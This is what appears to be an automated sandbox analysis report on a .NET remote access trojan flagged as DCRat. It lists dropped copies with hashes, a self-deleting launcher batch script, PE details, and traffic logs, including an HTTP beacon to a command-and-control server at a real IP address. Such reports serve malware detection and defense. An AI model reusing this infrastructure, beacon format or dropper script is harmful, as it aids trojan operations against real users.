            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DE1WXpFSpZKOZG1WXp+N23f/zEh:OTg9YDER3zK
            MD5:616C49E0E5C749668BA816C1108A185E
            SHA1:9959099D35B2DBB34271E5A3AC71EACD1732CA2A
            SHA-256:3967A8003BD6F2C80551250B1F58BFAF39FA0AC8ABE3FE992FFD5081148E2F60
            SHA-512:8D135A69DA111EFE83277A9C36E452FD54E6A5DC1D7B372E9BDDEB9F9C6374630DFF0727ABAB06BC38EA73C54161B2BAD7072509FACF5A5E1C4808F351C28B59
            Malicious:false
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\Desktop\w9d568i4Ia.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lJjcBPjH5n.bat"

            C:\Users\user\Desktop\RCX974A.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.3687134372758125
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:88A07738653DD9165C277AE3EC6E2BE1
            SHA1:DECA152AE4106F8103DDD63410BF75AF2D250798
            SHA-256:BDB41494118A0C2886AF0A18687F7F25B130B63057EC139C2C7DCB57BAB91C98
            SHA-512:C56E5D42BF1CDF8CC63727872A6572CF2EF5F27301878A3E432E1E3764D5949A6D0B85F73B67B66BBF2E0845BDF26D16E3EF77B82508DFA599EB4F96DDDF2E84
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Desktop\RCX999C.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Desktop\w9d568i4Ia.exe (copy)

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.3687134372758125
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:88A07738653DD9165C277AE3EC6E2BE1
            SHA1:DECA152AE4106F8103DDD63410BF75AF2D250798
            SHA-256:BDB41494118A0C2886AF0A18687F7F25B130B63057EC139C2C7DCB57BAB91C98
            SHA-512:C56E5D42BF1CDF8CC63727872A6572CF2EF5F27301878A3E432E1E3764D5949A6D0B85F73B67B66BBF2E0845BDF26D16E3EF77B82508DFA599EB4F96DDDF2E84
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Pictures\Camera Roll\9c12fca598790b

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):61
            Entropy (8bit):5.225498812830857
            Encrypted:false
            SSDEEP:3:wrRho+1AyULndC5rr4UnBQQIGw:4uDpCRtIGw
            MD5:012ECEC4E3C04E8B12D573BE5AF4685B
            SHA1:BC2985ACB2B0E5F5D20CD72AEE5537A278E50C21
            SHA-256:194A112DA6817921F90E2DEDD89898920AA7962CF9CF88DD60F34124AACDD181
            SHA-512:5F5BE14CE085FF20ED5D44EA34D913E2FFBC00880B8C1D37101BFC29A7E2C374C14B658675709AE39F95C68C353DEB077BADE3D4A56C07154018D5937EDB7786
            Malicious:false
            Preview:5XHthtDdrNtNTzSDw2PRcJO5W1Z9wBZGCgpgA3YJ3IHm61KMWp3vy6kvILWpU

            C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.369052275733074
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:0910C7CA6D38032D8572CB862B73EA5A
            SHA1:558F7F4DE373E01C5E66397CE6A71A2C8BCE16E4
            SHA-256:35675A963AC7581949F9FD54E791463F5BC3FB4369543F19C2006B45B66BF67B
            SHA-512:F56D2FB04E1A52516DA1AA5C7579360320AD89C779705FCBA03F3EEA3C3F3AE83E8D30E6A697BD483026FDB9A7B373C8FE75EB8EC23A8321FE8A8FFE8870CE02
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.......H............................................................................ ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc...H............H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Pictures\Camera Roll\RCX9E80.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.36855198388473
            Encrypted:false
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            MD5:2405CB014678984F0655CF9603C04ABD
            SHA1:8C85FE8A9AE968883AC7D3E2961CE764EEA9CFC1
            SHA-256:6A96C03F88BEA76297D2B820045E131470872901959B9130B4CA34B9B0C6A4F8
            SHA-512:812D10EC24D0EC869F91D3EB768C63B936F315A777EAF937E31081A13AB39C17C36884981A7322AC17667BE593D77466373850497387C6AB68AB6034006AAB3F
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.................................................................................... ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc................H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe:Zone.Identifier

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0

            \Device\Null

            Download File
            Process:C:\Windows\System32\w32tm.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):152
            Entropy (8bit):4.88236338271894
            Encrypted:false
            SSDEEP:3:VLV993J+miJWEoJ8FX1gTOlfNqvoFIvvj:Vx993DEUvOrVQ
            MD5:FDD2E4FAD535D0BFF33342D74464F0B2
            SHA1:36479DB8CB94FB79243CABBB0A71C36951290077
            SHA-256:C8C850E6F5265763BF4862A11843CFF79F7575455FE820CDDF4693E34DE6A71C
            SHA-512:B983D4D57E1F9DD10CD38095E24F156D898A4D11DE641AEED4024974CF216C13745E5DFA5EF630A191D4CE14B3FCE22FBB53BF69C72248509BAC89CD6773D23A
            Malicious:false
            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 9/20/2022 3:32:42 PM..15:32:42, error: 0x80072746.15:32:47, error: 0x80072746.

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):6.36855198388473
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Win16/32 Executable Delphi generic (2074/23) 0.01%
            File name:w9d568i4Ia.exe
            File size:937472
            MD5:2405cb014678984f0655cf9603c04abd
            SHA1:8c85fe8a9ae968883ac7d3e2961ce764eea9cfc1
            SHA256:6a96c03f88bea76297d2b820045e131470872901959b9130b4ca34b9b0c6a4f8
            SHA512:812d10ec24d0ec869f91d3eb768c63b936f315a777eaf937e31081a13ab39c17c36884981a7322ac17667be593d77466373850497387c6ab68ab6034006aab3f
            SSDEEP:24576:Gfee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:GGegmCGKWVL
            TLSH:831518017E84CE12F0191633C2EF854847F0A991BAA6E32B7DBA376D55163A37C1D9CB
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@................................

            File Icon

            Icon Hash:00828e8e8686b000

            Static PE Info

            General

            Entrypoint:0x4e335e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x62DD6184 [Sun Jul 24 15:13:08 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xe33100x4b.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe80000x3e8.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000xe13640xe1400False0.554147735155383data6.406382339957369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .sdata0xe40000x2fdf0x3000False0.3103841145833333data3.2415949872950858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0xe80000x3e80x400False0.5361328125data3.6568933831877732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xea0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_GROUP_ICON0xe80a00x6data
            RT_VERSION0xe80a80x340dataEnglishUnited States

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            194.190.152.128192.168.2.380497122850862 09/20/22-14:19:20.941772TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M48049712194.190.152.128192.168.2.3

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 20, 2022 14:19:02.605289936 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:02.665013075 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:02.666198969 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:02.666994095 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:02.727018118 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:02.845738888 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:02.845776081 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:02.845943928 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:07.846782923 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:07.846879959 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.815037012 CEST4971280192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.815478086 CEST4971180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.816907883 CEST4971380192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.873956919 CEST8049713194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.874130964 CEST4971380192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.874429941 CEST8049712194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.874528885 CEST4971280192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.874735117 CEST8049711194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.875137091 CEST4971380192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.875698090 CEST4971280192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.932173014 CEST8049713194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.934968948 CEST8049712194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.935020924 CEST8049712194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.940133095 CEST8049713194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.941771984 CEST8049712194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:20.982470036 CEST4971380192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:20.995605946 CEST4971280192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:21.055147886 CEST8049712194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:21.055252075 CEST4971280192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:21.075177908 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:21.132320881 CEST8049714194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:21.132549047 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:21.134597063 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:21.191807032 CEST8049714194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:21.195135117 CEST8049714194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:21.263840914 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:25.942629099 CEST8049713194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:25.945280075 CEST4971380192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.109827042 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.110498905 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.167444944 CEST8049714194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:26.169975042 CEST8049715194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:26.170186043 CEST4971480192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.170253992 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.172207117 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:26.231802940 CEST8049715194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:26.235904932 CEST8049715194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:26.279872894 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.239018917 CEST8049715194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:31.239237070 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.290101051 CEST4971880192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.290208101 CEST4971580192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.349587917 CEST8049718194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:31.349617958 CEST8049715194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:31.349740982 CEST4971880192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.352000952 CEST4971880192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:31.411771059 CEST8049718194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:31.415062904 CEST8049718194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:31.467756033 CEST4971880192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:36.419102907 CEST8049718194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:36.422169924 CEST4971880192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:36.423525095 CEST4972180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:36.480398893 CEST8049721194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:36.483509064 CEST4972180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:36.483727932 CEST4972180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:36.540827036 CEST8049721194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:36.540865898 CEST8049721194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:36.548834085 CEST8049721194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:36.702600002 CEST4972180192.168.2.3194.190.152.128
            Sep 20, 2022 14:19:41.551062107 CEST8049721194.190.152.128192.168.2.3
            Sep 20, 2022 14:19:41.551217079 CEST4972180192.168.2.3194.190.152.128

            HTTP Request Dependency Graph

            • 194.190.152.128

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.349711194.190.152.12880C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            TimestampkBytes transferredDirectionData
            Sep 20, 2022 14:19:02.666994095 CEST119OUTGET /downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3&dcf04bdc61b03a0822281dccebb6bfa0=be0f637a60d67b7d74fe87fa45ca0c84&8777d2f9c3d9f9dbfdad95d8b9ba9864=gZjFjYxYWZ5ImN0MDOwEjY2AjZ5czMmV2NwIGZiFGM1AzYyEWMyEGN&iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3 HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 194.190.152.128
            Connection: Keep-Alive
            Sep 20, 2022 14:19:02.845738888 CEST120INHTTP/1.1 200 OK
            Date: Tue, 20 Sep 2022 12:19:02 GMT
            Server: Apache/2.4.41 (Ubuntu)
            Vary: Accept-Encoding
            Content-Length: 2144
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=UTF-8
            Data Raw: 3d 3d 51 66 69 63 54 5a 69 56 54 4d 7a 49 57 5a 7a 45 47 4f 32 41 44 5a 34 59 32 4d 34 59 54 4d 69 64 44 4e 78 59 7a 4d 6b 5a 6a 4d 33 67 44 4d 69 6f 6a 49 69 56 6a 59 69 5a 32 4e 35 4d 6d 4e 6d 64 54 4f 31 45 57 5a 79 41 54 4f 6c 5a 54 4d 6c 4e 7a 59 78 51 6d 5a 69 5a 6a 59 68 56 6a 49 73 49 69 5a 52 39 6d 65 4f 52 56 57 31 77 6b 61 42 5a 54 53 75 70 45 62 6b 68 6b 53 73 52 57 62 31 59 58 55 7a 77 6d 61 69 31 6d 56 35 4e 6d 62 57 70 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 30 61 61 6c 55 55 35 6c 6b 4e 4a 70 47 61 48 5a 6c 52 57 5a 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 74 47 61 45 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 74 47 61 45 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 68 6d 61 68 68 6c 53 78 63 56 61 35 4d 6d 57 59 4a 6b 64 6a 35 6d 56 47 6c 6b 61 76 6c 6d 57 58 56 6a 64 6c 31 6d 56 30 46 47 57 53 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 31 45 52 42 64 58 54 54 6c 6b 4e 4a 35 6d 54 78 45 32 56 53 68 57 56 75 78 6d 61 5a 68 6c 53 78 6b 6c 4d 4f 4a 6b 59 74 6c 44 63 6b 64 6b 52 71 4a 6d 4d 34 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 39 45 52 46 4e 6a 54 54 52 44 4e 4a 70 32 62 70 70 31 56 53 46 44 5a 48 78 6d 62 69 31 57 4f 7a 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 55 4f 73 70 56 65 4a 64 57 53 42 39 32 63 4a 70 57 54 77 77 6b 61 6a 42 54 53 71 39 57 61 61 64 6c 55 78 51 32 52 73 42 54 57 58 68 6e 5a 69 31 47 62 75 52 32 56 34 64 6e 59 79 59 6c 62 4a 6c 57 51 6e 4e 55 61 33 6c 6d 57 59 4a 6b 64 6a 35 6d 56 47 6c 6b 61 76 6c 6d 57 58 46 44 61 55 35 6d 55 31 70 31 56 31 41 48 5a 48 56 6a 64 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 70 6b 56 53 4e 56 53 32 6b 55 62 57 74 6d 59 77 34 45 4d 69 31 6d 56 31 46 47 57 53 56 6e 59 79 34 6b 5a 69 31 47 62 75 52 32 56 34 64 6e 59 79 59 6c 62 4a 6c 57 51 6e 4e 55 61 34 78 32 59 79 67 48 61 61 70 32 62 70 70 46 57 53 68 32 59 73 4a 6c 51 57 35 6d 56 73 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 55 4f 73 70 56 65 4a 64 57 53 42 39 32 63 4e 52 30 62 70 5a 56 56 57 56 58 59 57 6c 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4b 74 6d 59 74 5a 30 63 6a 31 6d 56 32 51 32 52 73 4e 54 56 35 6c 6b 4e 4a 31 6d 56 30 6c 56 56 31 55 7a 59 75 4a 56 64 6b 64 56 4f 71 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 55 4f 73 70 56 65 4a 64 57 53 42 39 32 63 4a 74 47 61 45 6c 6b 61 76 6c 6d 57 58 4a 